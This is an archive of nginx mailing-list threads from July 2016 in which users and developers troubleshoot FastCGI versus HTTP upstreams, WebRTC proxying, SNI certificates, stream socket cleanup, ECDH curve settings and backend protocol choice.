From gnu.yair at outlook.com Sat Jul 2 06:21:38 2016
From: gnu.yair at outlook.com (=?iso-8859-1?Q?yair_avenda=F1o?=)
Date: Sat, 2 Jul 2016 06:21:38 +0000
Subject: Erro 502 Bad Gateway help
Message-ID:

Hi, I'm setting up nginx as a reverse proxy, but when I try to view a Drupal site locally I get a 502 Bad Gateway error. This is what I get in the logs:

2016/07/02 00:51:57 [error] 18120#0: *61 upstream sent unsupported FastCGI protocol version: 72 while reading response header from upstream, client: 127.0.0.1, server: localhost, request: "GET / HTTP/1.1", upstream: "fastcgi://127.0.0.1:8080", host: "localhost"

I can't figure out what is causing this error. The server operating system is Gentoo. Here is my vhost:

server {
        listen 80;
        server_name localhost;

        access_log /var/log/nginx/localhost_access_log main;
        error_log /var/log/nginx/localhost_error_log info;

        root /var/www/site/prueva/www/;

        location / {
                index index.html index.htm index.php;
                autoindex on;
                autoindex_exact_size off;
                autoindex_localtime on;
        }

        location ~ \.php$ {
                # Test for non-existent scripts or throw a 404 error
                # Without this line, nginx will blindly send any request ending in .php to php-fpm
                try_files $uri =404;
                include /etc/nginx/fastcgi.conf;
                fastcgi_pass 127.0.0.1:8080; ## Make sure the socket corresponds with PHP-FPM conf file
        }
}

-------------- next part --------------
An HTML attachment was scrubbed...
URL:

From odyssey471 at gmail.com Sat Jul 2 07:04:46 2016
From: odyssey471 at gmail.com (=?UTF-8?B?5Zub5bym?=)
Date: Sat, 2 Jul 2016 15:04:46 +0800
Subject: Erro 502 Bad Gateway help
In-Reply-To:
References:
Message-ID:

Hello,

Where did you install PHP? You can edit /path/to/php_dir/etc/php-fpm.conf, or sometimes there will be a directory called 'www.conf.d'; if so, make the change there, in the www.conf file inside www.conf.d.
You will find an option called 'listen' in that configuration file; make sure its value is '127.0.0.1:8080', and if it is not, change it to '127.0.0.1:8080'. Alternatively, you can edit the nginx configuration file and change the 'fastcgi_pass' option instead.

But I recommend using a unix socket to connect to php-fastcgi; it is faster. To do this, just change php-fpm.conf or www.conf like this:

[www]
...
user=www
group=www
...
listen = /dev/shm/php-cgi.sock
listen.owner = www
listen.group = www
listen.mode = 0660

'...' just stands for something omitted.

Then change the 'fastcgi_pass' option to 'unix:/dev/shm/php-cgi.sock', restart nginx and PHP, and all done!

P.S.: My mother tongue isn't English; if there is something you couldn't understand, please let me know, thanks!

2016-07-02 14:21 GMT+08:00 yair avendaño :

> Hi I'm setting up a nginx as a reverse proxy but to try to see a site with
> drupal locally that have shown me 502 Bad Gateway error.
> this gets me in the logs.
>
> 2016/07/02 00:51:57 [error] 18120#0: *61 upstream sent unsupported FastCGI
> protocol version: 72 while reading response header from upstream, client:
> 127.0.0.1, server: localhost, request: "GET / HTTP/1.1", upstream:
> "fastcgi://127.0.0.1:8080", host: "localhost"
>
> I can not get him out of there I find that causes this error. the server
> operating system is a gentoo.
I show my vhost > > > server { > listen 80; > server_name localhost; > > access_log /var/log/nginx/localhost_access_log main; > error_log /var/log/nginx/localhost_error_log info; > > root /var/www/site/prueva/www/; > > location / { > index index.html index.htm index.php; > autoindex on; > autoindex_exact_size off; > autoindex_localtime on; > > } > > location ~ \.php$ { > # Test for non-existent scripts or throw a 404 error > # Without this line, nginx will blindly send any > request ending in .php to php-fpm > try_files $uri =404; > include /etc/nginx/fastcgi.conf; > fastcgi_pass 127.0.0.1:8080; ## Make sure the > socket corresponds with PHP-FPM conf file > } > } > > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From francis at daoine.org Sat Jul 2 07:25:19 2016 From: francis at daoine.org (Francis Daly) Date: Sat, 2 Jul 2016 08:25:19 +0100 Subject: Erro 502 Bad Gateway help In-Reply-To: References: Message-ID: <20160702072519.GG12280@daoine.org> On Sat, Jul 02, 2016 at 06:21:38AM +0000, yair avenda?o wrote: Hi there, > Hi I'm setting up a nginx as a reverse proxy but to try to see a site with drupal locally that have shown me 502 Bad Gateway error. "drupal" is possibly served by a http server, not a fastcgi server. > this gets me in the logs. > > > 016/07/02 00:51:57 [error] 18120#0: *61 upstream sent unsupported FastCGI protocol version: 72 while reading response header from upstream, client: 127.0.0.1, server: localhost, request: "GET / HTTP/1.1", upstream: "fastcgi://127.0.0.1:8080", host: " localhost" If you make a bad http request to a http server, it will likely return something that starts with "HTTP". The decimal value of ascii "H" is "72"; a fastcgi client may expect the first octet to refer to the fastcgi protocol version. 
So your error message hints that your upstream is not a fastcgi server but is a http server. Which in turn suggests that the fix is: > location ~ \.php$ { > # Test for non-existent scripts or throw a 404 error > # Without this line, nginx will blindly send any request ending in .php to php-fpm > try_files $uri =404; > include /etc/nginx/fastcgi.conf; * delete those two > fastcgi_pass 127.0.0.1:8080; ## Make sure the socket corresponds with PHP-FPM conf file * replace that with proxy_pass http://127.0.0.1:8080; f -- Francis Daly francis at daoine.org From medvedev.yp at gmail.com Sat Jul 2 07:59:57 2016 From: medvedev.yp at gmail.com (Yuriy Medvedev) Date: Sat, 2 Jul 2016 10:59:57 +0300 Subject: Erro 502 Bad Gateway help In-Reply-To: References: <20160702072519.GG12280@daoine.org> Message-ID: Hi. You must use fastcgi_pass if you use fastcgi server as backend e.g. php-fpm. If you use apache as backend you must use proxy_pass. 2 ???? 2016 ?. 10:25 ???????????? "Francis Daly" ???????: On Sat, Jul 02, 2016 at 06:21:38AM +0000, yair avenda?o wrote: Hi there, > Hi I'm setting up a nginx as a reverse proxy but to try to see a site with drupal locally that have shown me 502 Bad Gateway error. "drupal" is possibly served by a http server, not a fastcgi server. > this gets me in the logs. > > > 016/07/02 00:51:57 [error] 18120#0: *61 upstream sent unsupported FastCGI protocol version: 72 while reading response header from upstream, client: 127.0.0.1, server: localhost, request: "GET / HTTP/1.1", upstream: "fastcgi://127.0.0.1:8080", host: " localhost" If you make a bad http request to a http server, it will likely return something that starts with "HTTP". The decimal value of ascii "H" is "72"; a fastcgi client may expect the first octet to refer to the fastcgi protocol version. So your error message hints that your upstream is not a fastcgi server but is a http server. 
Which in turn suggests that the fix is: > location ~ \.php$ { > # Test for non-existent scripts or throw a 404 error > # Without this line, nginx will blindly send any request ending in .php to php-fpm > try_files $uri =404; > include /etc/nginx/fastcgi.conf; * delete those two > fastcgi_pass 127.0.0.1:8080; ## Make sure the socket corresponds with PHP-FPM conf file * replace that with proxy_pass http://127.0.0.1:8080; f -- Francis Daly francis at daoine.org _______________________________________________ nginx mailing list nginx at nginx.org http://mailman.nginx.org/mailman/listinfo/nginx -------------- next part -------------- An HTML attachment was scrubbed... URL: From ben+nginx at list-subs.com Sat Jul 2 16:21:24 2016 From: ben+nginx at list-subs.com (Ben) Date: Sat, 2 Jul 2016 17:21:24 +0100 Subject: WebRTC and NGINX Reverse Proxy Message-ID: <67335e67-dc16-5904-d740-33fecc5b8f69@list-subs.com> Hi, I have a PBX that has a webRTC feature (i.e. you login to PBX website and you have a virtual handset with all the features). Is it feasible or possible to use NGINX as a reverse proxy to handle webRTC ? A basic NGINX config just using proxy_pass doesn't seem to work, so I'm guessing there's probably more to it than that ? THanks ! 
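For reference, WebSocket-style upgrades generally need HTTP/1.1 plus the Upgrade and Connection headers forwarded, following the pattern in the official nginx WebSocket proxying documentation. A minimal sketch (the backend address is a placeholder); the map ensures plain requests still get a normal Connection header:

```nginx
# Placeholder upstream; substitute the PBX's WebRTC/WebSocket endpoint.
map $http_upgrade $connection_upgrade {
    default upgrade;
    ''      close;
}

server {
    listen 443 ssl;

    location / {
        proxy_pass http://127.0.0.1:8088;
        proxy_http_version 1.1;
        proxy_set_header Upgrade $http_upgrade;
        proxy_set_header Connection $connection_upgrade;
        proxy_set_header Host $host;
    }
}
```

Note that this only covers the HTTPS/WebSocket signalling path; the actual WebRTC media (SRTP over UDP) is negotiated peer-to-peer and does not pass through nginx at all, which is often why a plain proxy_pass setup appears not to work.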
From unixro at gmail.com Mon Jul 4 08:27:31 2016
From: unixro at gmail.com (Mihai Vintila)
Date: Mon, 4 Jul 2016 11:27:31 +0300
Subject: WebRTC and NGINX Reverse Proxy
In-Reply-To: <67335e67-dc16-5904-d740-33fecc5b8f69@list-subs.com>
References: <67335e67-dc16-5904-d740-33fecc5b8f69@list-subs.com>
Message-ID:

It works with something like this:

location ^~ /webrtc/ {
    if ($my_https = "off") {
        return 301 https://$host$request_uri;
    }
    limit_conn conn 100;
    limit_req zone=basic burst=3000 nodelay;
    proxy_pass http://backend;
    proxy_set_header X-Real-IP $remote_addr;
    proxy_read_timeout 600s;
    proxy_send_timeout 600s;
    proxy_connect_timeout 20s;
    proxy_http_version 1.1;
    proxy_set_header Upgrade $http_upgrade;
    proxy_set_header Connection upgrade;
    proxy_set_header Host $host;
}

Best regards,
Vintila Mihai Alexandru

On 7/2/2016 7:21 PM, Ben wrote:
> Hi,
>
> I have a PBX that has a webRTC feature (i.e. you login to PBX website
> and you have a virtual handset with all the features).
>
> Is it feasible or possible to use NGINX as a reverse proxy to handle
> webRTC ?
>
> A basic NGINX config just using proxy_pass doesn't seem to work, so
> I'm guessing there's probably more to it than that ?
>
> THanks !
>
> _______________________________________________
> nginx mailing list
> nginx at nginx.org
> http://mailman.nginx.org/mailman/listinfo/nginx

From nginx-forum at forum.nginx.org Mon Jul 4 10:31:02 2016
From: nginx-forum at forum.nginx.org (Sushma)
Date: Mon, 04 Jul 2016 06:31:02 -0400
Subject: SNI support for nginx
Message-ID: <9af133d4fd296ba618c1962065af8102.NginxMailingListEnglish@forum.nginx.org>

Hi,

I am relatively new to nginx. I would like to set up multiple domains on the same port. Nginx has SNI support enabled. Do I still have to point to the right SSL certificate and SSL private key in each of the server blocks using the ssl_certificate directive?
Or is there a way, nginx will be able to dynamically figure out the cert to be presented without it being explicitly mentioned via the directive ssl_certificate? Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268024,268024#msg-268024 From mdounin at mdounin.ru Mon Jul 4 11:18:57 2016 From: mdounin at mdounin.ru (Maxim Dounin) Date: Mon, 4 Jul 2016 14:18:57 +0300 Subject: SNI support for nginx In-Reply-To: <9af133d4fd296ba618c1962065af8102.NginxMailingListEnglish@forum.nginx.org> References: <9af133d4fd296ba618c1962065af8102.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20160704111857.GP30781@mdounin.ru> Hello! On Mon, Jul 04, 2016 at 06:31:02AM -0400, Sushma wrote: > I am relatively new to nginx. > I would like to setup multiple domains on the same port. Nginx has SNI > support enabled. > Do i have to still point to the right ssl certificate and ssl private in > each of server blocks using the ssl_certificate directive? Yes. > Or is there a way, nginx will be able to dynamically figure out the cert to > be presented without it being explicitly mentioned via the directive > ssl_certificate? No. -- Maxim Dounin http://nginx.org/ From pratyush at hostindya.com Mon Jul 4 10:41:30 2016 From: pratyush at hostindya.com (Pratyush Kumar) Date: Mon, 04 Jul 2016 16:11:30 +0530 Subject: SNI support for nginx In-Reply-To: <9af133d4fd296ba618c1962065af8102.NginxMailingListEnglish@forum.nginx.org> Message-ID: <1e9246e8-7b66-4a7a-b32c-e7b434bb2109@email.android.com> An HTML attachment was scrubbed... URL: From ben+nginx at list-subs.com Mon Jul 4 11:28:58 2016 From: ben+nginx at list-subs.com (Ben) Date: Mon, 4 Jul 2016 12:28:58 +0100 Subject: WebRTC and NGINX Reverse Proxy In-Reply-To: References: <67335e67-dc16-5904-d740-33fecc5b8f69@list-subs.com> Message-ID: <0352927a-7cbc-484e-38d0-f41abd13dac7@list-subs.com> Sounds fabulous. Thank Vintila ! 
On 04/07/2016 09:27, Mihai Vintila wrote: > It works with something like this: > > > location ^~ /webrtc/ { > if ($my_https = "off") { > return 301 https://$host$request_uri; > } > limit_conn conn 100; > limit_req zone=basic burst=3000 nodelay; > proxy_pass http://backend; > proxy_set_header X-Real-IP $remote_addr; > proxy_read_timeout 600s; > proxy_send_timeout 600s; > proxy_connect_timeout 20s; > proxy_http_version 1.1; > proxy_set_header Upgrade $http_upgrade; > proxy_set_header Connection upgrade; > proxy_set_header Host $host; > } > > Best regards, > Vintila Mihai Alexandru > > On 7/2/2016 7:21 PM, Ben wrote: >> Hi, >> >> I have a PBX that has a webRTC feature (i.e. you login to PBX website >> and you have a virtual handset with all the features). >> >> Is it feasible or possible to use NGINX as a reverse proxy to handle >> webRTC ? >> >> A basic NGINX config just using proxy_pass doesn't seem to work, so >> I'm guessing there's probably more to it than that ? >> >> THanks ! >> >> _______________________________________________ >> nginx mailing list >> nginx at nginx.org >> http://mailman.nginx.org/mailman/listinfo/nginx > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx From anoopalias01 at gmail.com Mon Jul 4 13:35:49 2016 From: anoopalias01 at gmail.com (Anoop Alias) Date: Mon, 4 Jul 2016 19:05:49 +0530 Subject: nginx not removing stream socket Message-ID: Hi, On CentOS7 . nginx is not removing the stream socket on shutdown causing restarts to fail unless the socket file is manually removed. 
The nginx process itself exits, but because the socket file is not removed, nginx is unable to bind to it on the next start.

systemd unit file
#######################

[Service]
Type=forking
PIDFile=/var/run/nginx.pid
ExecStartPre=/usr/sbin/nginx -t -c /etc/nginx/nginx.conf
ExecStart=/usr/sbin/nginx -c /etc/nginx/nginx.conf
ExecReload=/bin/kill -s HUP $MAINPID
ExecStop=/bin/kill -s QUIT $MAINPID
PrivateTmp=true

[Install]
WantedBy=multi-user.target
###########################

#nginx configuration

stream {
    upstream mysql_backend {
        server unix:/var/lib/mysql/mysql_original.sock;
        server x.x.x.x:13306 backup;
    }

    server {
        listen 127.0.0.1:3306;
        listen unix:/var/lib/mysql/mysql.sock;
        proxy_pass mysql_backend;
    }
}
######################################

The same setup works fine on a CentOS 6 server with init, which uses the killproc function from /etc/rc.d/init.d/functions. Even on CentOS 6, if I do

kill -QUIT

the binary exits without removing the socket.

What am I doing wrong? What is the correct signal to terminate the process and remove the bound sockets?

Thanks,
--
Anoop P Alias

From anoopalias01 at gmail.com Mon Jul 4 13:53:01 2016
From: anoopalias01 at gmail.com (Anoop Alias)
Date: Mon, 4 Jul 2016 19:23:01 +0530
Subject: nginx not removing stream socket
In-Reply-To:
References:
Message-ID:

OK, just found this - https://trac.nginx.org/nginx/ticket/753

So shall I use SIGTERM instead of SIGQUIT in the systemd unit file?

On Mon, Jul 4, 2016 at 7:05 PM, Anoop Alias wrote:
> Hi,
>
> On CentOS7 . nginx is not removing the stream socket on shutdown
> causing restarts to fail unless the socket file is manually removed.
> nginx process itself exit .But becase of the file not being removed > nginx is unable to bind to the socket file on next start > > systemd unit file > ####################### > > [Service] > Type=forking > PIDFile=/var/run/nginx.pid > ExecStartPre=/usr/sbin/nginx -t -c /etc/nginx/nginx.conf > ExecStart=/usr/sbin/nginx -c /etc/nginx/nginx.conf > ExecReload=/bin/kill -s HUP $MAINPID > ExecStop=/bin/kill -s QUIT $MAINPID > PrivateTmp=true > > [Install] > WantedBy=multi-user.target > ########################### > > #nginx configuration > > stream { > upstream mysql_backend { > server unix:/var/lib/mysql/mysql_original.sock; > server x.x.x.x:13306 backup; > } > > server { > listen 127.0.0.1:3306; > listen unix:/var/lib/mysql/mysql.sock; > proxy_pass mysql_backend; > } > } > ###################################### > > The same setting is working fine on a centos6 server with init . > > which use the killproc function from /etc/rc.d/init.d/functions > > Even on CentOS6 ..if I do > > kill -QUIT > > the binary exits without removing the socket. > > What am I doing wrong?. > > What is the correct signal to terminate the process and remove the > sockets bound. > > Thanks, > -- > Anoop P Alias -- Anoop P Alias From nginx-forum at forum.nginx.org Mon Jul 4 17:28:45 2016 From: nginx-forum at forum.nginx.org (st.gabrielli) Date: Mon, 04 Jul 2016 13:28:45 -0400 Subject: Issue with KeepAlive Message-ID: <706ac92ca7a8ac480d792062e8329ef8.NginxMailingListEnglish@forum.nginx.org> Hi all, I need help on managing KeepAlive on my nginx webservice. Seeing error logs seems that many keepalive HTTP request are discarded by Nginx. On client side this behaviour seems to be a timeout. 
This is my code:

if (strlen(session->response) > 0) {
    b->pos = (u_char *)session->response;
    b->last = (u_char *)session->response + strlen(session->response);
    r->headers_out.content_type_len = strlen("application/json") - 1;
    r->headers_out.content_type.data = (u_char *) "application/json";
    r->headers_out.status = NGX_HTTP_OK;
} else {
    b->pos = (u_char *)r->args.data;
    b->last = (u_char *)r->args.data + r->args.len;
    r->headers_out.status = NGX_HTTP_NO_CONTENT;
}
r->headers_out.content_length_n = strlen(session->response);
b->memory = 1;
b->last_buf = 1;
ftime(&end);
felapsed = (int) (1000.0 * (end.time - start.time) + (end.millitm - start.millitm));
ngx_http_send_header(r);
ngx_http_output_filter(r, &out);
ngx_http_finalize_request(r, r->headers_out.status);

Sometimes I send a 200 OK and other times a 204. In the nginx error log I see:

2016/07/04 11:06:11 [debug] 11643#11643: *13 http finalize request: 204, "/mopub_bidr?" a:1, c:2
2016/07/04 11:06:11 [debug] 11643#11643: *13 http terminate request count:2
2016/07/04 11:06:11 [debug] 11643#11643: *13 http terminate cleanup count:2 blk:0
2016/07/04 11:06:11 [debug] 11643#11643: *13 http finalize request: -4, "/mopub_bidr?" a:1, c:2
2016/07/04 11:06:11 [debug] 11643#11643: *13 http request count:2 blk:0
2016/07/04 11:06:11 [debug] 11643#11643: *13 http posted request: "/mopub_bidr?"

Can someone explain what "finalize request: -4" means? Is it an error?

Sometimes in the error log I also find this error: recv() not ready, and this seems to be the cause of the client timeouts. How can I resolve it in the nginx conf?

Thanks a lot for the help
Stefano G.
Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268052,268052#msg-268052

From gopal.raghavan at here.com Tue Jul 5 04:06:29 2016
From: gopal.raghavan at here.com (Raghavan, Gopal)
Date: Tue, 5 Jul 2016 04:06:29 +0000
Subject: Order of execution of nginx filters
In-Reply-To: <59DDEEE5-3681-49E4-930E-F18FB560AFB8@here.com>
References: <59DDEEE5-3681-49E4-930E-F18FB560AFB8@here.com>
Message-ID: <60A141E5-41D9-42D5-B3E1-38A63919FB5B@here.com>

Hi,

I have the following three directives:

location = /hello {
    hello_world;
    hola_mundo on;
    bonjour_monde on;
}

hello_world is an nginx handler module that provides the content "hello world". hola_mundo and bonjour_monde are filters that add the strings "hola mundo" and "bonjour monde" to the chain, respectively.

Here is the output:

curl "http://localhost:8090/hello"
hello worldhola mundobonjour monde

Switching the filter directives in the location block has no impact on the output string. For example:

location = /hello {
    hello_world;
    bonjour_monde on;
    hola_mundo on;
}

Here is the output:

curl "http://localhost:8090/hello"
hello worldhola mundobonjour monde

How do I control the order of execution of filters? I already looked at objs/ngx_modules.c and auto/modules. My custom handlers and filters are not listed there. One thing that I observed is that the order of the load_module modules/*.so lines in conf/nginx.conf does impact the order of execution of the filters. Is there any other trick to adjust the execution order within the location block?

Thanks,
--
Gopal

-------------- next part --------------
An HTML attachment was scrubbed...
URL:

From florian at bottledsoftware.de Tue Jul 5 12:00:04 2016
From: florian at bottledsoftware.de (Florian Reinhart)
Date: Tue, 5 Jul 2016 14:00:04 +0200
Subject: Setting ssl_ecdh_curve to secp384r1 does not work
Message-ID:

Hi all,

I was running nginx 1.9.12 on Ubuntu 14.04 built from the source tarball with these options: --with-ipv6 --with-http_ssl_module --with-http_v2_module --with-openssl=/openssl-1.0.2g

While switching to a new server, I also wanted to switch to the nginx Docker container using my existing nginx config.

First, I discovered an issue with missing ALPN support due to an old OpenSSL version in Debian Jessie (see https://github.com/nginxinc/docker-nginx/issues/76 ). Therefore, I switched to the Alpine image and discovered another issue.

The issue seems to be related to the ssl_ecdh_curve setting. In my config I set it to secp384r1. With this setting present clients won't connect. This is what curl outputs:

curl -vvvv -k "https://localhost"
* Rebuilt URL to: https://localhost/
*   Trying ::1...
* connect to ::1 port 443 failed: Connection refused
*   Trying 127.0.0.1...
* Connected to localhost (127.0.0.1) port 443 (#0)
* ALPN, offering h2
* ALPN, offering http/1.1
* Cipher selection: ALL:!EXPORT:!EXPORT40:!EXPORT56:!aNULL:!LOW:!RC4:@STRENGTH
* successfully set certificate verify locations:
*   CAfile: /usr/local/etc/openssl/cert.pem
    CApath: none
* TLSv1.2 (OUT), TLS header, Certificate Status (22):
* TLSv1.2 (OUT), TLS handshake, Client hello (1):
* TLSv1.2 (IN), TLS header, Unknown (21):
* TLSv1.2 (IN), TLS alert, Server hello (2):
* error:14077410:SSL routines:SSL23_GET_SERVER_HELLO:sslv3 alert handshake failure
* Closing connection 0
curl: (35) error:14077410:SSL routines:SSL23_GET_SERVER_HELLO:sslv3 alert handshake failure

When I remove ssl_ecdh_curve from my config or set it to auto (which is the default) everything works fine.
To investigate this issue further I created a virtual machine running Ubuntu 16.04 and installed the latest nginx from the official package source: http://nginx.org/en/linux_packages.html I was able to reproduce the exact same issue in this virtual machine. Do you have an idea what?s going on here? Please let me know if you need any additional information. Thanks! Florian From mdounin at mdounin.ru Tue Jul 5 13:20:26 2016 From: mdounin at mdounin.ru (Maxim Dounin) Date: Tue, 5 Jul 2016 16:20:26 +0300 Subject: Setting ssl_ecdh_curve to secp384r1 does not work In-Reply-To: References: Message-ID: <20160705132026.GH30781@mdounin.ru> Hello! On Tue, Jul 05, 2016 at 02:00:04PM +0200, Florian Reinhart wrote: > Hi all, > > I was running nginx 1.9.12 on Ubuntu 14.04 built from the source tarball with these options: --with-ipv6 --with-http_ssl_module --with-http_v2_module --with-openssl=/openssl-1.0.2g > > While switching to a new server, I also wanted to switch to the nginx Docker container using my existing nginx config. > > First, I discovered an issue with missing ALPN support due to an old OpenSSL version in Debian Jessie (see https://github.com/nginxinc/docker-nginx/issues/76 ). Therefore, I switched to the Alpine image and discovered another issue. > > The issue seems to be related to the ssl_ecdh_curve setting. In my config I set it to secp384r1. With this setting present clients won?t connect. This is what curl outputs: > > curl -vvvv -k "https://localhost" > * Rebuilt URL to: https://localhost/ > * Trying ::1... > * connect to ::1 port 443 failed: Connection refused > * Trying 127.0.0.1... 
> * Connected to localhost (127.0.0.1) port 443 (#0) > * ALPN, offering h2 > * ALPN, offering http/1.1 > * Cipher selection: ALL:!EXPORT:!EXPORT40:!EXPORT56:!aNULL:!LOW:!RC4:@STRENGTH > * successfully set certificate verify locations: > * CAfile: /usr/local/etc/openssl/cert.pem > CApath: none > * TLSv1.2 (OUT), TLS header, Certificate Status (22): > * TLSv1.2 (OUT), TLS handshake, Client hello (1): > * TLSv1.2 (IN), TLS header, Unknown (21): > * TLSv1.2 (IN), TLS alert, Server hello (2): > * error:14077410:SSL routines:SSL23_GET_SERVER_HELLO:sslv3 alert handshake failure > * Closing connection 0 > curl: (35) error:14077410:SSL routines:SSL23_GET_SERVER_HELLO:sslv3 alert handshake failure > > > When I remove ssl_ecdh_curve from my config or set it to auto (which is the default) everything works fine. > > To investigate this issue further I created a virtual machine running Ubuntu 16.04 and installed the latest nginx from the official package source: http://nginx.org/en/linux_packages.html I was able to reproduce the exact same issue in this virtual machine. > > Do you have an idea what?s going on here? Please let me know if you need any additional information. It looks like the client doesn't support the curve you've configured, and non-ECDH ciphers are disabled. -- Maxim Dounin http://nginx.org/ From florian at bottledsoftware.de Tue Jul 5 14:02:21 2016 From: florian at bottledsoftware.de (Florian Reinhart) Date: Tue, 5 Jul 2016 16:02:21 +0200 Subject: Setting ssl_ecdh_curve to secp384r1 does not work In-Reply-To: <20160705132026.GH30781@mdounin.ru> References: <20160705132026.GH30781@mdounin.ru> Message-ID: <85E0F220-DDD0-498A-B031-A965997C637C@bottledsoftware.de> Hi Maxim! That?s what I thought. 
However, all clients can access the nginx server on the old Ubuntu 14.04 server, which uses the same config, I tested the following clients on OS X 10.11.5, all failed to connect: curl, installed from Homebrew: curl 7.49.1 (x86_64-apple-darwin15.5.0) libcurl/7.49.1 OpenSSL/1.0.2h zlib/1.2.5 nghttp2/1.12.0 Safari 9.1.1 (11601.6.17) Chrome 51.0.2704.106 Firefox 47.0.1 That?s why I don?t think it is a client issue. Best, Florian > On 05 Jul 2016, at 15:20, Maxim Dounin wrote: > > Hello! > > On Tue, Jul 05, 2016 at 02:00:04PM +0200, Florian Reinhart wrote: > >> Hi all, >> >> I was running nginx 1.9.12 on Ubuntu 14.04 built from the source tarball with these options: --with-ipv6 --with-http_ssl_module --with-http_v2_module --with-openssl=/openssl-1.0.2g >> >> While switching to a new server, I also wanted to switch to the nginx Docker container using my existing nginx config. >> >> First, I discovered an issue with missing ALPN support due to an old OpenSSL version in Debian Jessie (see https://github.com/nginxinc/docker-nginx/issues/76 ). Therefore, I switched to the Alpine image and discovered another issue. >> >> The issue seems to be related to the ssl_ecdh_curve setting. In my config I set it to secp384r1. With this setting present clients won?t connect. This is what curl outputs: >> >> curl -vvvv -k "https://localhost" >> * Rebuilt URL to: https://localhost/ >> * Trying ::1... >> * connect to ::1 port 443 failed: Connection refused >> * Trying 127.0.0.1... 
>> * Connected to localhost (127.0.0.1) port 443 (#0) >> * ALPN, offering h2 >> * ALPN, offering http/1.1 >> * Cipher selection: ALL:!EXPORT:!EXPORT40:!EXPORT56:!aNULL:!LOW:!RC4:@STRENGTH >> * successfully set certificate verify locations: >> * CAfile: /usr/local/etc/openssl/cert.pem >> CApath: none >> * TLSv1.2 (OUT), TLS header, Certificate Status (22): >> * TLSv1.2 (OUT), TLS handshake, Client hello (1): >> * TLSv1.2 (IN), TLS header, Unknown (21): >> * TLSv1.2 (IN), TLS alert, Server hello (2): >> * error:14077410:SSL routines:SSL23_GET_SERVER_HELLO:sslv3 alert handshake failure >> * Closing connection 0 >> curl: (35) error:14077410:SSL routines:SSL23_GET_SERVER_HELLO:sslv3 alert handshake failure >> >> >> When I remove ssl_ecdh_curve from my config or set it to auto (which is the default) everything works fine. >> >> To investigate this issue further I created a virtual machine running Ubuntu 16.04 and installed the latest nginx from the official package source: http://nginx.org/en/linux_packages.html I was able to reproduce the exact same issue in this virtual machine. >> >> Do you have an idea what?s going on here? Please let me know if you need any additional information. > > It looks like the client doesn't support the curve you've > configured, and non-ECDH ciphers are disabled. > > -- > Maxim Dounin > http://nginx.org/ > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx -------------- next part -------------- An HTML attachment was scrubbed... URL: From bpugh at cscontract.com Tue Jul 5 14:26:22 2016 From: bpugh at cscontract.com (Brian Pugh) Date: Tue, 5 Jul 2016 14:26:22 +0000 Subject: does nginx forward requests to backend servers using http or https? Message-ID: <1467728782092.71066@cscontract.com> I am using the free version of nginx on RHEL 6.7. 
The version is : nginx-1.10.1-1.el6.ngx.x86_64 When using nginx as a load balancer I would like to know if nginx forwards requests to backend servers using http or https?? -------------- next part -------------- An HTML attachment was scrubbed... URL: From drew at drewnturner.com Tue Jul 5 14:33:49 2016 From: drew at drewnturner.com (Drew Turner) Date: Tue, 5 Jul 2016 09:33:49 -0500 Subject: does nginx forward requests to backend servers using http or https? In-Reply-To: <1467728782092.71066@cscontract.com> References: <1467728782092.71066@cscontract.com> Message-ID: You define what you want it sent to the backend as. So if you use http://backendserver it's http, if https://backendserver:443 - https. On Tue, Jul 5, 2016 at 9:26 AM, Brian Pugh wrote: > I am using the free version of nginx on RHEL 6.7. The version is : > > > nginx-1.10.1-1.el6.ngx.x86_64 > > > When using nginx as a load balancer I would like to know if nginx forwards > requests to backend servers using http or https?? > > > > > > > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From mdounin at mdounin.ru Tue Jul 5 14:39:48 2016 From: mdounin at mdounin.ru (Maxim Dounin) Date: Tue, 5 Jul 2016 17:39:48 +0300 Subject: Setting ssl_ecdh_curve to secp384r1 does not work In-Reply-To: <85E0F220-DDD0-498A-B031-A965997C637C@bottledsoftware.de> References: <20160705132026.GH30781@mdounin.ru> <85E0F220-DDD0-498A-B031-A965997C637C@bottledsoftware.de> Message-ID: <20160705143948.GJ30781@mdounin.ru> Hello! On Tue, Jul 05, 2016 at 04:02:21PM +0200, Florian Reinhart wrote: > Hi Maxim! > > That?s what I thought. 
However, all clients can access the nginx server on the old Ubuntu 14.04 server, which uses the same config, > > I tested the following clients on OS X 10.11.5, all failed to connect: > > curl, installed from Homebrew: curl 7.49.1 (x86_64-apple-darwin15.5.0) libcurl/7.49.1 OpenSSL/1.0.2h zlib/1.2.5 nghttp2/1.12.0 > Safari 9.1.1 (11601.6.17) > Chrome 51.0.2704.106 > Firefox 47.0.1 > > That?s why I don?t think it is a client issue. Yes, at least browsers are expected to support secp384r1, so it's probably something different. Which certificate do you use? Is it the same as on the old server? Such a situation can easily happen if the only certificate available is ECDSA one and uses, e.g., prime256v1 (not secp384r1), but only secp384r1 is enabled by the configuration. Looking into nginx error logs might also somewhat help to diagnose what goes on here. -- Maxim Dounin http://nginx.org/ From bpugh at cscontract.com Tue Jul 5 14:41:42 2016 From: bpugh at cscontract.com (Brian Pugh) Date: Tue, 5 Jul 2016 14:41:42 +0000 Subject: does nginx forward requests to backend servers using http or https? In-Reply-To: References: <1467728782092.71066@cscontract.com>, Message-ID: <1467729702919.45075@cscontract.com> Are you referring to the proxy pass declaration? If so I get an error when I uncomment that line out saying "nginx: [emerg] "proxy_pass" directive is not allowed here in /etc/nginx/conf.d/default.conf:40?" ________________________________ From: nginx on behalf of Drew Turner Sent: Tuesday, July 5, 2016 9:33 AM To: nginx at nginx.org Subject: Re: does nginx forward requests to backend servers using http or https? You define what you want it sent to the backend as. So if you use http://backendserver it's http, if https://backendserver:443 - https. On Tue, Jul 5, 2016 at 9:26 AM, Brian Pugh > wrote: I am using the free version of nginx on RHEL 6.7. 
